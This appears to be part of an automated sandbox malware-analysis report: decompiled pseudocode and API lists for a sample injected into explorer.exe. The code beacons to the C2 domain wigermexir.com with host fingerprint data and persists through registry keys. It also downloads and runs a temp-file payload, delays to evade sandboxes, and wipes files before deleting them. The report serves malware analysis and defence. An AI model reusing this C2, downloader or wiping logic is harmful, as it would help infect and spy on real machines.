    					_t276 =  *0x7cc355; // 0x0
    					_v4428 = _t276;
    					E007C1308( &_v4424, 0x7cc384);
    					while(1) {
    						_t281 =  &_v4428;
    						_t279 =  *0x7ca194; // 0x7c1e9c, executed
    						_t280 = E007C5AE8(_t279,  &_v4428, 0); // executed
    						_v12 = _t280;
    						if(_v12 != 0) {
    							goto L4;
    						}
    						Sleep(0x4e20);
    					}
    					while(1) {
    						L4:
    						_v48 = 0;
    						E007C64BC( &_v156, 0x32, __eflags);
    						_t283 =  *0x7ca198; // 0x7c1eac
    						E007C1308(_v40, _t283);
    						E007C133C(_v40, "1530474054");
    						_t131 =  *0x7ca19c; // 0x7c1eb4
    						E007C133C(_v40, _t131);
    						_t135 =  *0x7cb77c; // 0x0
    						E007C1864(_t135,  &_v4253);
    						E007C133C(_v40,  &_v4253);
    						_t140 =  *0x7ca0bc; // 0x7c1c84
    						E007C133C(_v40, _t140);
    						_t144 =  *0x7cc380; // 0x0
    						E007C1864(_t144,  &_v4253);
    						E007C133C(_v40,  &_v4253);
    						_t149 =  *0x7ca0c0; // 0x7c1c8c
    						E007C133C(_v40, _t149);
    						_t152 =  *0x7cc37c; // 0x0
    						E007C1164(_t152,  &_v4253);
    						E007C133C(_v40,  &_v4253);
    						_t157 =  *0x7ca0b4; // 0x7c1c70
    						E007C133C(_v40, _t157);
    						E007C8258( &_v4253); // executed
    						E007C133C(_v40,  &_v4253);
    						_t165 =  *0x7ca0b8; // 0x7c1c78
    						E007C133C(_v40, _t165);
    						E007C133C(_v40, 0x7c8984);
    						_t170 =  *0x7ca0c4; // 0x7c1c94
    						E007C133C(_v40, _t170);
    						_t174 =  *0x7cc355; // 0x0
    						E007C1864(_t174,  &_v4253);
    						E007C133C(_v40,  &_v4253);
    						_t317 = _t301 + 0x80;
    						__eflags = _v4382;
    						if(_v4382 != 0) {
    							E007C133C(_v40,  &_v4382);
    							_t317 = _t317 + 8;
    						}
    						_t179 =  *0x7ca1bc; // 0x7c1ef8
    						E007C133C(_v40, _t179);
    						E007C4154( &_v4253);
    						E007C133C(_v40,  &_v4253);
    						_t187 =  *0x7ca0c8; // 0x7c1c9c
    						E007C133C(_v40, _t187);
    						_t301 = _t317 + 0x18;
    						_v8 = 0;
    						_v44 = GetTickCount();
    						__eflags = _v44 - 0x3a98;
    						if(_v44 < 0x3a98) {
    							__eflags = 0x3a98;
    							Sleep(0x3a98 - _v44);
    						}
    						_t195 = E007C12DC(_v40);
    						_t198 =  *0x7cc230; // 0x7c23ae
    						_t199 =  *0x7cb784; // 0xd4
    						_v12 = E007C5D20(_t281, _t199 &  *0x7ca074, _t198,  &_v156, "wigermexir.com/auth/", 0x7cc355, _v40, _t195,  &_v16,  &_v20);
    						__eflags = _v12;
    						if(_v12 == 0) {
    							break;
    						}
    						_t289 =  *0x7ca240; // 0x7c20a8
    						_v36 = E007C1110(_v16, _t289);
    						_v24 = _v16;
    						_t220 =  *0x7cc355; // 0x0
    						 *0x7cb64d = _t220;
    						 *0x7cb780 = E007C5468();
    						E007C7474(0x7cb61c, __eflags);
    						_t290 =  *0x7ca1a8; // 0x7c1ecc
    						__eflags =  *_v24 -  *_t290;
    						if( *_v24 ==  *_t290) {
    							L21:
    							E007C1440(_v16);
    							do {
    								_v48 = _v48 + 1;
    								Sleep(0x3e8);
    								_v52 = _v52 + 1;
    								_t228 =  *0x7cb715; // 0x12c
    								__eflags = _t228 - _v48;
    							} while (__eflags > 0);
    							continue;
    						}
    						_v56 = 0;
    						_v28 = 0;
    						_t291 =  *0x7ca190; // 0x7c1e8c
    						_v28 = E007C1110(_v24, _t291);
    						__eflags = _v28;
    						if(_v28 == 0) {
    							_t292 =  *0x7ca18c; // 0x7c1e7c
    							_v28 = E007C1110(_v24, _t292);
    						} else {
    							_v56 = 0xffffffff;
    						}
    						__eflags = _v28;
    						if(_v28 != 0) {
    							_v44 = _v28 - _v24;
    							_v28 = _v28 + 0xd;
    							_v36 = E007C1110(_v28, E007C8988);
    							_v32 = _v36 - _v28;
    							_t281 = _v32;
    							E007C12B8( &_v4253, _v32, _v28);
    							 *((char*)(_t300 + _v32 - 0x1099)) = 0;
    							_v32 = E007C10E0( &_v4253, _v28);
    							_t269 = _v36 + 2;
    							__eflags = _t269;
    							_v28 = _t269;
    							 *((char*)(_v24 + _v44)) = 0;
    						}
    						__eflags = _v56;
    						if(__eflags == 0) {
    							L19:
    							_t236 = E007C7F20(_v24, _t281, 4);
    							__eflags = _t236;
    							if(_t236 != 0) {
    								E007C80C0(_v56);
    								E007C1440(_v40);
    								E007C1440(_v16);
    								_push(0);
    								RtlExitUserThread();
    							}
    							goto L21;
    						} else {
    							_t281 = _v32;
    							__eflags = E007C82F8(_v24, _v32, _v28, __eflags);
    							if(__eflags == 0) {
    								E007C1440(_v16);
    								continue;
    							}
    							E007C80C0(_v56);
    							E007C1440(_v40);
    							E007C1440(_v16);
    							_push(0);
    							RtlExitUserThread();
    							goto L19;
    						}
    					}
    					_t202 =  *0x7cc355; // 0x0
    					_v4428 = _t202;
    					E007C1308( &_v4424, 0x7cc384);
    					_t205 =  *0x7cb651; // 0x5b3d3566
    					_t208 =  *0x7cb784; // 0xd4
    					_t281 =  *0x7cb780; // 0x5b3d3566, executed
    					_t210 = E007C660C(_t208 &  *0x7ca074, _t281, 0x7cb625, __eflags, 0x7cba00,  &_v4428,  &_v4253, _t205); // executed
    					__eflags = _t210;
    					if(__eflags != 0) {
    						E007C1308(0x7cb625,  &_v4253);
    						E007C1308(0x7cc254,  &_v4253);
    					}
    					 *0x7cc355 = _v4428;
    					 *0x7cb64d = _v4428;
    				}
    			}

    APIs
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    • Sleep.KERNEL32(00004E20), ref: 007C8519
      • Part of subcall function 007C64BC: GetVersionExA.KERNEL32(0000009C), ref: 007C6530
      • Part of subcall function 007C1864: wsprintfA.USER32 ref: 007C1874
      • Part of subcall function 007C8258: WSAStartup.WS2_32(00000101,?), ref: 007C8276
      • Part of subcall function 007C8258: gethostname.WS2_32(?,00000040), ref: 007C8282
      • Part of subcall function 007C8258: gethostbyname.WS2_32(?), ref: 007C828C
      • Part of subcall function 007C8258: inet_ntoa.WS2_32(?), ref: 007C82B6
      • Part of subcall function 007C8258: WSACleanup.WS2_32 ref: 007C82E9
      • Part of subcall function 007C4154: GetKeyboardLayoutList.USER32(00000009,?), ref: 007C4169
    • GetTickCount.KERNEL32 ref: 007C86EB
    • Sleep.KERNEL32(00003A98), ref: 007C8706
      • Part of subcall function 007C5468: GetSystemTime.KERNEL32(?), ref: 007C5472
      • Part of subcall function 007C7474: RegCreateKeyExA.KERNELBASE(80000002,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C750D
      • Part of subcall function 007C7474: RegCreateKeyExA.ADVAPI32(80000001,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C7533
    • RtlExitUserThread.NTDLL(00000000), ref: 007C88B6
      • Part of subcall function 007C82F8: GetTempPathA.KERNEL32(00000201,?), ref: 007C8364
      • Part of subcall function 007C82F8: Sleep.KERNEL32(000005DC), ref: 007C83E3
      • Part of subcall function 007C82F8: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007C840C
      • Part of subcall function 007C82F8: wsprintfA.USER32 ref: 007C8476
    • RtlExitUserThread.NTDLL(00000000), ref: 007C8879
      • Part of subcall function 007C80C0: RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 007C80DB
      • Part of subcall function 007C80C0: CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 007C80E9
      • Part of subcall function 007C80C0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C8106
      • Part of subcall function 007C80C0: CloseHandle.KERNEL32(00000000), ref: 007C8112
      • Part of subcall function 007C80C0: SendMessageA.USER32(00060258,00000010,00000000,00000000), ref: 007C8184
      • Part of subcall function 007C80C0: SHDeleteKeyA.SHLWAPI(80000002,007C21A4), ref: 007C81BB
      • Part of subcall function 007C80C0: SHDeleteKeyA.SHLWAPI(80000001,007C21A4), ref: 007C81FB
      • Part of subcall function 007C80C0: ReleaseMutex.KERNEL32(00000228), ref: 007C8221
      • Part of subcall function 007C80C0: CloseHandle.KERNEL32(00000228), ref: 007C822D
      • Part of subcall function 007C80C0: ExitProcess.KERNEL32 ref: 007C8244
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
      • Part of subcall function 007C660C: Sleep.KERNEL32(000927C0), ref: 007C66F5
      • Part of subcall function 007C660C: GetTickCount.KERNEL32 ref: 007C66FD
      • Part of subcall function 007C660C: GetTickCount.KERNEL32 ref: 007C67AF
      • Part of subcall function 007C660C: Sleep.KERNELBASE(00001388), ref: 007C67CD
      • Part of subcall function 007C660C: Sleep.KERNELBASE(000493E0), ref: 007C67F3
      • Part of subcall function 007C660C: Sleep.KERNEL32(000927C0), ref: 007C680F
    • Sleep.KERNEL32(000003E8), ref: 007C895F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Control-flow Graph

    C-Code - Quality: 96%
    			E007C4608(intOrPtr* _a4) {
    				long _v8;
    				CHAR* _v12;
    				long _v16;
    				void* _v20;
    				long _v24;
    				intOrPtr _v28;
    				long _v32;
    				char _v36;
    				void _v548;
    				signed int _t42;
    				void* _t46;
    				int _t48;
    				char _t58;
    
    				_v8 = 0;
    				_v16 =  *_a4;
    				_v12 = _a4 + 4;
    				while(1) {
    					_t42 = E007C3988(_v12); // executed
    					asm("sbb eax, eax");
    					if( ~( ~_t42) == 0) {
    						break;
    					}
    					_t46 = CreateFileA(_v12, 0xc0000000, 0, 0, 3, 0x20000080, 0); // executed
    					_v20 = _t46;
    					if(_v20 == 0xffffffff) {
    						L8:
    						_t48 = DeleteFileA(_v12); // executed
    						_v8 = _t48;
    						if(_v8 != 0 || _v16 == 0) {
    							L13:
    							E007C1440(_a4);
    							return _v8;
    						} else {
    							if(_v16 <= 0x64) {
    								Sleep(_v16);
    								_v16 = 0;
    							} else {
    								Sleep(0x64);
    								_v16 = _v16 - 0x64;
    							}
    							continue;
    						}
    					}
    					_v24 = GetFileSize(_v20, 0);
    					_t58 = (_v24 >> 9) + 1;
    					if(_t58 <= 0) {
    						L7:
    						FlushFileBuffers(_v20);
    						CloseHandle(_v20);
    						goto L8;
    					}
    					_v36 = _t58;
    					_v28 = 1;
    					do {
    						WriteFile(_v20,  &_v548, 0x200,  &_v32, 0); // executed
    						_v28 = _v28 + 1;
    						_t21 =  &_v36;
    						 *_t21 = _v36 - 1;
    					} while ( *_t21 != 0);
    					goto L7;
    				}
    				_v8 = 0xffffffff;
    				goto L13;
    			}

    APIs
      • Part of subcall function 007C3988: FindFirstFileA.KERNELBASE(?,?), ref: 007C39A4
      • Part of subcall function 007C3988: FindClose.KERNEL32(000000FF), ref: 007C39BF
    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000003,20000080,00000000), ref: 007C465B
    • GetFileSize.KERNEL32(000000FF,00000000), ref: 007C4670
    • WriteFile.KERNELBASE(000000FF,?,00000200,?,00000000), ref: 007C46A4
    • FlushFileBuffers.KERNEL32(000000FF), ref: 007C46B6
    • CloseHandle.KERNEL32(000000FF), ref: 007C46C0
    • DeleteFileA.KERNELBASE(?), ref: 007C46CA
    • Sleep.KERNEL32(00000064), ref: 007C46E7
    • Sleep.KERNEL32(00000064), ref: 007C46FA
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Control-flow Graph

    C-Code - Quality: 95%
    			E007C660C(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				signed int _v20;
    				signed int _v24;
    				char _v28;
    				char _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				long _v48;
    				intOrPtr _v52;
    				char _v181;
    				char _v264;
    				char _v329;
    				char _v394;
    				intOrPtr _t116;
    				signed int _t117;
    				intOrPtr _t123;
    				signed int _t125;
    				signed int _t131;
    				signed int _t151;
    				intOrPtr _t154;
    				signed int _t155;
    				intOrPtr _t175;
    				signed int _t177;
    				intOrPtr _t195;
    				void* _t201;
    				void* _t202;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = 0;
    				E007C64BC( &_v264, 0x51, __eflags); // executed
    				_v36 = E007C1110(_v12, E007C6900);
    				_v40 = _v36 - _v12;
    				E007C12B8( &_v329, _v40, _v12);
    				 *((char*)(_t201 + _v40 - 0x145)) = 0;
    				E007C1308( &_v394,  &_v329);
    				_v44 = 1;
    				L1:
    				while(1) {
    					if(_v44 % 0x32 == 0 || _v44 == 1) {
    						L3:
    						_t184 = _a8;
    						_t116 =  *0x7ca194; // 0x7c1e9c, executed
    						_t117 = E007C5AE8(_t116, _a8, 0); // executed
    						_v24 = _t117;
    						if(_v24 == 0) {
    							Sleep(0x927c0);
    							goto L3;
    						}
    						_t123 =  *0x7cc230; // 0x7c23ae
    						_t125 = E007C5D20(_t184, _v8, _t123,  &_v264, _v12, _a8, 0, 0,  &_v28,  &_v32); // executed
    						_v24 = _t125;
    						if(_v24 == 0) {
    							goto L7;
    						} else {
    							E007C1440(_v28);
    							_v20 = 0;
    							goto L39;
    						}
    					} else {
    						L7:
    						_v48 = GetTickCount();
    						_t195 =  *0x7cc230; // 0x7c23ae
    						E007C6340( &_v329, 0x94, _t195, __eflags);
    						_v24 = 0;
    						_t131 = E007C1110(_a4,  &_v329);
    						__eflags = _t131;
    						if(_t131 == 0) {
    							E007C1308( &_v181,  &_v329);
    							E007C133C( &_v181, _v36);
    							_t202 = _t202 + 8;
    							_t175 =  *0x7cc230; // 0x7c23ae
    							_t177 = E007C5D20(0x94, _v8, _t175,  &_v264,  &_v181, _a8, 0, 0,  &_v28,  &_v32); // executed
    							_v24 = _t177;
    						}
    						__eflags = _v24;
    						if(_v24 == 0) {
    							_v48 = GetTickCount() - _v48;
    							__eflags = _v48 - 0x1388;
    							if(_v48 < 0x1388) {
    								__eflags = 0x1388;
    								Sleep(0x1388 - _v48); // executed
    							}
    							_v52 = E007C5468();
    							__eflags = _v44 - 5;
    							if(_v44 != 5) {
    								L19:
    								__eflags = _v52 - _v16 - 0x3f480;
    								if(_v52 - _v16 >= 0x3f480) {
    									__eflags = _v52 - _v16 - 0x3f480;
    									if(_v52 - _v16 <= 0x3f480) {
    										L28:
    										__eflags = _v52 - _v16 - 0x7e900;
    										if(_v52 - _v16 <= 0x7e900) {
    											L33:
    											__eflags = _v52 - _v16 - 0xd2f00;
    											if(_v52 - _v16 > 0xd2f00) {
    												__eflags = _v44 - 0x12c;
    												if(_v44 != 0x12c) {
    													_t95 =  &_v44;
    													 *_t95 = _v44 + 1;
    													__eflags =  *_t95;
    												} else {
    													_v44 = 1;
    												}
    											}
    											L37:
    											__eflags = _v44 - 1;
    											if(__eflags == 0) {
    												E007C1308( &_v329,  &_v394);
    											}
    											continue;
    										}
    										__eflags = _v52 - _v16 - 0xd2f00;
    										if(_v52 - _v16 >= 0xd2f00) {
    											goto L33;
    										}
    										__eflags = _v44 - 0xc8;
    										if(_v44 != 0xc8) {
    											_v44 = _v44 + 1;
    										} else {
    											_v44 = 1;
    										}
    										goto L37;
    									}
    									__eflags = _v52 - _v16 - 0x7e900;
    									if(_v52 - _v16 >= 0x7e900) {
    										goto L28;
    									}
    									__eflags = _v44 - 0x64;
    									if(_v44 != 0x64) {
    										_v44 = _v44 + 1;
    									} else {
    										_v44 = 1;
    									}
    									goto L37;
    								}
    								__eflags = _v44 - 0x32;
    								if(_v44 != 0x32) {
    									_v44 = _v44 + 1;
    								} else {
    									_v44 = 1;
    								}
    								goto L37;
    							} else {
    								__eflags = _v52 - _a16 - 0x927c0;
    								if(_v52 - _a16 >= 0x927c0) {
    									goto L19;
    								}
    								Sleep(0x493e0); // executed
    								_t151 = E007C5620(); // executed
    								asm("sbb eax, eax");
    								__eflags =  ~( ~_t151);
    								if( ~( ~_t151) == 0) {
    									while(1) {
    										_t154 =  *0x7ca194; // 0x7c1e9c
    										_t155 = E007C5AE8(_t154, _a8, 0);
    										asm("sbb eax, eax");
    										__eflags =  ~( ~_t155);
    										if( ~( ~_t155) != 0) {
    											goto L19;
    										}
    										Sleep(0x927c0);
    									}
    								}
    								goto L19;
    							}
    						} else {
    							E007C1308(_a12,  &_v181);
    							E007C1440(_v28);
    							_v20 = 0xffffffff;
    							L39:
    							return _v20;
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 007C64BC: GetVersionExA.KERNEL32(0000009C), ref: 007C6530
    • Sleep.KERNEL32(000927C0), ref: 007C66F5
    • GetTickCount.KERNEL32 ref: 007C66FD
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    • GetTickCount.KERNEL32 ref: 007C67AF
    • Sleep.KERNELBASE(00001388), ref: 007C67CD
      • Part of subcall function 007C5468: GetSystemTime.KERNEL32(?), ref: 007C5472
    • Sleep.KERNELBASE(000493E0), ref: 007C67F3
    • Sleep.KERNEL32(000927C0), ref: 007C680F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Control-flow Graph

    C-Code - Quality: 91%
    			E007C8AA4(void* __edx, void* __eflags) {
    				struct _WNDCLASSEXA _v52;
    				struct tagMSG _v80;
    				char _v97;
    				void* _t14;
    				struct HWND__* _t26;
    
    				E007C1164(E007C10B4(E007C1164(E007C10B4(_t14, __edx),  &_v97),  &_v97),  &(( &_v97)[8]));
    				E007C1258( &_v52, 0x30);
    				_v52.cbSize = 0x30;
    				_v52.hInstance = 0;
    				_v52.lpszClassName =  &_v97;
    				_v52.lpfnWndProc = E007C8A48;
    				RegisterClassExA( &_v52);
    				_t26 = CreateWindowExA(0,  &_v97, 0, 0, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, 0, 0); // executed
    				 *0x7ca574 = _t26;
    				if( *0x7ca574 != 0) {
    					while(GetMessageA( &_v80, 0, 0, 0) != 0) {
    						TranslateMessage( &_v80);
    						DispatchMessageA( &_v80);
    					}
    				}
    				_push(0);
    				return RtlExitUserThread();
    			}

    APIs
    • RegisterClassExA.USER32(00000030), ref: 007C8AF1
    • CreateWindowExA.USER32(00000000,?,00000000,00000000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007C8B1D
    • TranslateMessage.USER32(?), ref: 007C8B37
    • DispatchMessageA.USER32(?), ref: 007C8B41
    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 007C8B51
    • RtlExitUserThread.NTDLL(00000000), ref: 007C8B5D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Control-flow Graph

    C-Code - Quality: 88%
    			E007C42D4(void* __eax) {
    				void* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				void* _v20;
    				long _v24;
    				void** _v28;
    				intOrPtr _v32;
    				char* _v36;
    				intOrPtr* _v40;
    				signed int _t40;
    				signed int _t47;
    				signed int _t59;
    
    				_v8 = __eax;
    				_v16 = 0;
    				_t40 = OpenProcessToken(_v8, 8,  &_v20);
    				asm("sbb eax, eax");
    				if( ~( ~_t40) == 0) {
    					L17:
    					_v12 = _v16;
    					return _v12;
    				}
    				_t47 = GetTokenInformation(_v20, 0x19, 0, 0,  &_v24); // executed
    				asm("sbb eax, eax");
    				if( ~( ~_t47) != 0 || GetLastError() != 0x7a) {
    					L16:
    					CloseHandle(_v20);
    					goto L17;
    				} else {
    					_v28 = E007C13DC(_v24);
    					if(_v28 == 0) {
    						goto L16;
    					}
    					_t59 = GetTokenInformation(_v20, 0x19, _v28, _v24,  &_v24); // executed
    					asm("sbb eax, eax");
    					if( ~( ~_t59) != 0) {
    						_v36 = GetSidSubAuthorityCount( *_v28);
    						if(_v36 != 0 &&  *_v36 > 0) {
    							_v40 = GetSidSubAuthority( *_v28, ( *_v36 & 0x000000ff) - 1);
    							if(_v40 != 0) {
    								_v32 =  *_v40;
    								if(_v32 >= 0x2000) {
    									if(_v32 < 0x2000 || _v32 >= 0x3000) {
    										if(_v32 >= 0x3000) {
    											_v16 = 3;
    										}
    									} else {
    										_v16 = 2;
    									}
    								} else {
    									_v16 = 1;
    								}
    							}
    						}
    					}
    					E007C1440(_v28);
    					goto L16;
    				}
    			}

    APIs
    • OpenProcessToken.ADVAPI32(?,00000008,?), ref: 007C42EC
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 007C430E
    • GetLastError.KERNEL32 ref: 007C4322
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 007C4358
    • GetSidSubAuthorityCount.ADVAPI32(?), ref: 007C436E
    • GetSidSubAuthority.ADVAPI32(?,?), ref: 007C4393
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    • CloseHandle.KERNEL32(?), ref: 007C43F3
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Control-flow Graph

    C-Code - Quality: 64%
    			E007C4408(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
    				intOrPtr* _v8;
    				struct _SECURITY_DESCRIPTOR* _v12;
    				struct _ACL* _v16;
    				void* _v20;
    				int _v24;
    				int _v28;
    				struct _ACL* _v32;
    				intOrPtr _t37;
    				signed int _t38;
    				signed int _t50;
    				signed int _t59;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
    					_t37 =  *0x7ca0d4; // 0x7c1cb4
    					_t38 =  *0x7cb32c(_t37, 1,  &_v20, 0); // executed
    					asm("sbb eax, eax");
    					if( ~( ~_t38) == 0) {
    						_v20 = 0xffffffff;
    					} else {
    						_v32 = 0;
    						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
    						asm("sbb eax, eax");
    						if( ~( ~_t50) == 0) {
    							L5:
    							LocalFree(_v20);
    							_v20 = 0xffffffff;
    						} else {
    							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
    							asm("sbb eax, eax");
    							if( ~( ~_t59) == 0) {
    								goto L5;
    							}
    						}
    					}
    					if(_v8 != 0) {
    						 *_v8 = 0xc;
    						 *(_v8 + 4) = _v12;
    						 *((intOrPtr*)(_v8 + 8)) = 0;
    					}
    					_v16 = _v20;
    				}
    				return _v16;
    			}

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 007C441F
    • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 007C4437
    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(007C1CB4,00000001,?,00000000), ref: 007C4453
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 007C4478
    • SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 007C4498
    • LocalFree.KERNEL32(?), ref: 007C44AC
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Control-flow Graph

    C-Code - Quality: 64%
    			E007C4406(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
    				intOrPtr* _v8;
    				struct _SECURITY_DESCRIPTOR* _v12;
    				struct _ACL* _v16;
    				void* _v20;
    				int _v24;
    				int _v28;
    				struct _ACL* _v32;
    				intOrPtr _t37;
    				signed int _t38;
    				signed int _t50;
    				signed int _t59;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
    					_t37 =  *0x7ca0d4; // 0x7c1cb4
    					_t38 =  *0x7cb32c(_t37, 1,  &_v20, 0); // executed
    					asm("sbb eax, eax");
    					if( ~( ~_t38) == 0) {
    						_v20 = 0xffffffff;
    					} else {
    						_v32 = 0;
    						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
    						asm("sbb eax, eax");
    						if( ~( ~_t50) == 0) {
    							L6:
    							LocalFree(_v20);
    							_v20 = 0xffffffff;
    						} else {
    							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
    							asm("sbb eax, eax");
    							if( ~( ~_t59) == 0) {
    								goto L6;
    							}
    						}
    					}
    					if(_v8 != 0) {
    						 *_v8 = 0xc;
    						 *(_v8 + 4) = _v12;
    						 *((intOrPtr*)(_v8 + 8)) = 0;
    					}
    					_v16 = _v20;
    				}
    				return _v16;
    			}

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 007C441F
    • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 007C4437
    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(007C1CB4,00000001,?,00000000), ref: 007C4453
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 007C4478
    • SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 007C4498
    • LocalFree.KERNEL32(?), ref: 007C44AC
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Control-flow Graph

    C-Code - Quality: 94%
    			E007C7A44(void* __ecx) {
    				int _v8;
    				int _v12;
    				void* _v16;
    				char _v20;
    				char _v24;
    				intOrPtr _v28;
    				char _v1053;
    				char _v1074;
    				int _t44;
    				int _t51;
    				void* _t91;
    
    				_t91 = __ecx;
    				_v8 = 0;
    				 *0x7cb00c = 0;
    				GetModuleFileNameA(0,  &_v1053, 0x401);
    				E007C48DC( &_v1053, _t91, 0x7cb00c);
    				_t44 = GetFileVersionInfoSizeA( &_v1053,  &_v12); // executed
    				_v12 = _t44;
    				if(_v12 != 0) {
    					_v16 = E007C13DC(_v12);
    					_t51 = GetFileVersionInfoA( &_v1053, _v8, _v12, _v16); // executed
    					if(_t51 != 0) {
    						_v24 = 0x34;
    						 *0x7cb298(_v16, E007C7BFC,  &_v20,  &_v24);
    						_v28 = _v20;
    						E007C133C("explorer 10.0.10586.104", 0x7c7c00);
    						E007C1864(E007C1884( *(_v28 + 0x10)) & 0x0000ffff,  &_v1074);
    						E007C133C("explorer 10.0.10586.104",  &_v1074);
    						E007C133C("explorer 10.0.10586.104", 0x7c7c04);
    						E007C1864( *(_v28 + 0x10) & 0x0000ffff,  &_v1074);
    						E007C133C("explorer 10.0.10586.104",  &_v1074);
    						E007C133C("explorer 10.0.10586.104", 0x7c7c04);
    						E007C1864(E007C1884( *(_v28 + 0x14)) & 0x0000ffff,  &_v1074);
    						E007C133C("explorer 10.0.10586.104",  &_v1074);
    						E007C133C("explorer 10.0.10586.104", 0x7c7c04);
    						E007C1864( *(_v28 + 0x14) & 0x0000ffff,  &_v1074);
    						E007C133C("explorer 10.0.10586.104",  &_v1074);
    					}
    					return E007C1440(_v16);
    				}
    				return _t44;
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000401), ref: 007C7A67
    • GetFileVersionInfoSizeA.KERNELBASE(?,?), ref: 007C7A88
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    • GetFileVersionInfoA.KERNELBASE(?,?,00000000,?), ref: 007C7AB9
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
